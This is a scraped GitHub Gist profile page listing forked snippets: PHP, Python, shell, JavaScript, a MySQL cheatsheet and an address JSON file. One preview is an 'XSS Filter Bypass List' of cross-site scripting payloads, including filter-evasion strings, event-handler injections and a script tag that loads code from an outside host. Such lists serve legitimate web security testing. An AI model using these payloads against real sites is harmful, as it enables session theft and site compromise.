Skip to content

Instantly share code, notes, and snippets.

View AbiruzzamanMolla's full-sized avatar
🏠
Working from home

Abiruzzaman Molla AbiruzzamanMolla

🏠
Working from home
View GitHub Profile
<?php
require 'Unicode2Bijoy.php'; // https://github.com/mirazmac/Unicode2Bijoy
use mirazmac\Unicode2Bijoy;
$str = Unicode2Bijoy::convert("যুক্তাক্ষর প্রিন্ট করা \n খুবই সোজা"); //convert the text
$im = imagecreatetruecolor(300, 300); //create the image
$bg = imagecolorallocate($im, 255, 255, 255); //allocating white background image
@AbiruzzamanMolla
AbiruzzamanMolla / servers.py
Created December 20, 2016 22:16 — forked from maateen/servers.py
Hello Sysadmin, make life easier on Terminal. :)
"""
Documentation
1. At first, save the entire script as servers.py in /home/your-username/ directory.
Also you can simply use the below command:
curl "https://gist.githubusercontent.com/maateen/1582a28d62437caaf5cf9098303bab79/raw/e216b3b1ff8f1323fb79de4ae5a4c5b24a8b2c4d/servers.py" > ~/servers.py
2. Change info in servers = {} portion according to your need.
Always use Server Identity at the left side of : sign and SSH Login Command at the right side.
@AbiruzzamanMolla
AbiruzzamanMolla / xxsfilterbypass.lst
Created November 20, 2017 10:36 — forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@AbiruzzamanMolla
AbiruzzamanMolla / README.md
Created January 13, 2018 09:32 — forked from hofmannsven/README.md
My simply MySQL Command Line Cheatsheet
@AbiruzzamanMolla
AbiruzzamanMolla / anmol-terminal.sh
Created February 14, 2018 09:11 — forked from anmoljagetia/anmol-terminal.sh
This is a script that adds a profile similar to the screenshot shown with Flatabulous in Gnome-Terminal.
#!/usr/bin/env bash
# Base16 - Gnome Terminal color scheme install script
[[ -z "$PROFILE_NAME" ]] && PROFILE_NAME="flatabulous-terminal"
[[ -z "$PROFILE_SLUG" ]] && PROFILE_SLUG="flatabulous-terminal"
[[ -z "$DCONF" ]] && DCONF=dconf
[[ -z "$UUIDGEN" ]] && UUIDGEN=uuidgen
dset() {
local key="$1"; shift
# Your init script
#
# Atom will evaluate this file each time a new window is opened. It is run
# after packages are loaded/activated and after the previous editor state
# has been restored.
#
# An example hack to log to the console when each text editor is saved.
#
# atom.workspace.observeTextEditors (editor) ->
# editor.onDidSave ->
@AbiruzzamanMolla
AbiruzzamanMolla / combinators.js
Created February 21, 2018 04:28 — forked from Avaq/combinators.js
Common combinators in JavaScript
const I = x => x;
const K = x => y => x;
const A = f => x => f(x);
const T = x => f => f(x);
const W = f => x => f(x)(x);
const C = f => y => x => f(x)(y);
const B = f => g => x => f(g(x));
const S = f => g => x => f(x)(g(x));
const P = f => g => x => y => f(g(x))(g(y));
const Y = f => (g => g(g))(g => f(x => g(g)(x)));

Keybase proof

I hereby claim:

  • I am asliabir on github.
  • I am asliabir (https://keybase.io/asliabir) on keybase.
  • I have a public key ASA_L8nBgE5Agrc-UqK_S68eVcOqvXWkZ3o9frdw4i370Qo

To claim this, I am signing this object:

@AbiruzzamanMolla
AbiruzzamanMolla / index.html
Created April 19, 2018 14:33 — forked from pifantastic/index.html
A simple todo list I'm using for an Intro to jQuery talk.
<!DOCTYPE hmtl>
<html>
<head><title>My todo list</title></head>
<body>
<h1>My todo list:</h1>
<form>
<input type="text" id="item" />
<input type="submit" id="save" value="Save" />
</form>
<ul id="list"></ul>
@AbiruzzamanMolla
AbiruzzamanMolla / address.json
Created July 7, 2018 18:39 — forked from AminulBD/address.json
Bangladdesh divisions, districts and upazila list in php array and json
{
"Rajshahi": {
"Joypurhat": [
"Akkelpur",
"Joypurhat Sadar",
"Kalai",
"Khetlal",
"Panchbibi"
],
"Bogura": [